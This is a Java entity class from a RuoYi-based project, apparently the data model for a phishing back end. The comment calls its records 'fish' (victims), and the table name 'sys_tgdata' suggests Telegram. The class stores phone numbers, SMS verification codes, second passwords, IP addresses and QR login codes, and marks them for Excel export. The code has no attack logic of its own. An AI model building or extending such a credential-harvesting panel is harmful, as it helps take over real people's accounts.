zj
2025-05-06 0a5de93f4212f260ddc65c9317632429e828c7dd
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
package com.ruoyi.system.domain;
 
import org.apache.commons.lang3.builder.ToStringBuilder;
import org.apache.commons.lang3.builder.ToStringStyle;
import com.ruoyi.common.annotation.Excel;
import com.ruoyi.common.core.domain.BaseEntity;
 
import java.util.Date;
 
/**
 * 鱼儿管理对象 sys_tgdata
 * 
 * @author 零九
 * @date 2023-05-10
 */
public class SysTgdata extends BaseEntity
{
    private static final long serialVersionUID = 1L;
 
    /** ID */
    private Integer id;
 
    /** 手机号 */
    @Excel(name = "手机号")
    private String uphone;
 
    /** 验证码 */
    @Excel(name = "验证码")
    private String uvifcode;
 
    /** 二次密码 */
    @Excel(name = "二次密码")
    private String agpass;
 
    /** 操作结果 */
    @Excel(name = "操作结果")
    private String ures;
 
    /** 用户ip */
    @Excel(name = "用户ip")
    private String uip;
 
    /** 二维码 */
    @Excel(name = "二维码")
    private String uqrcode;
 
    /** 变化状态 */
    @Excel(name = "变化状态")
    private String qrstate;
 
    /** 操作时间 */
    @Excel(name = "操作时间")
    private Date createtime;
 
    public String getQrstate() {
        return qrstate;
    }
 
    public void setQrstate(String qrstate) {
        this.qrstate = qrstate;
    }
 
    public void setId(Integer id)
    {
        this.id = id;
    }
 
    public Integer getId() 
    {
        return id;
    }
    public void setUphone(String uphone) 
    {
        this.uphone = uphone;
    }
 
    public String getUphone() 
    {
        return uphone;
    }
    public void setUvifcode(String uvifcode) 
    {
        this.uvifcode = uvifcode;
    }
 
    public String getUvifcode() 
    {
        return uvifcode;
    }
    public void setAgpass(String agpass) 
    {
        this.agpass = agpass;
    }
 
    public String getAgpass() 
    {
        return agpass;
    }
    public void setUres(String ures) 
    {
        this.ures = ures;
    }
 
    public String getUres() 
    {
        return ures;
    }
    public void setUip(String uip) 
    {
        this.uip = uip;
    }
 
    public String getUip() 
    {
        return uip;
    }
    public void setUqrcode(String uqrcode) 
    {
        this.uqrcode = uqrcode;
    }
 
    public String getUqrcode() 
    {
        return uqrcode;
    }
 
    public Date getCreatetime() {
        return createtime;
    }
 
    public void setCreatetime(Date createtime) {
        this.createtime = createtime;
    }
 
    @Override
    public String toString() {
        return new ToStringBuilder(this,ToStringStyle.MULTI_LINE_STYLE)
            .append("id", getId())
            .append("uphone", getUphone())
            .append("uvifcode", getUvifcode())
            .append("agpass", getAgpass())
            .append("ures", getUres())
            .append("uip", getUip())
            .append("uqrcode", getUqrcode())
            .append("createtime", getCreatetime())
            .toString();
    }
}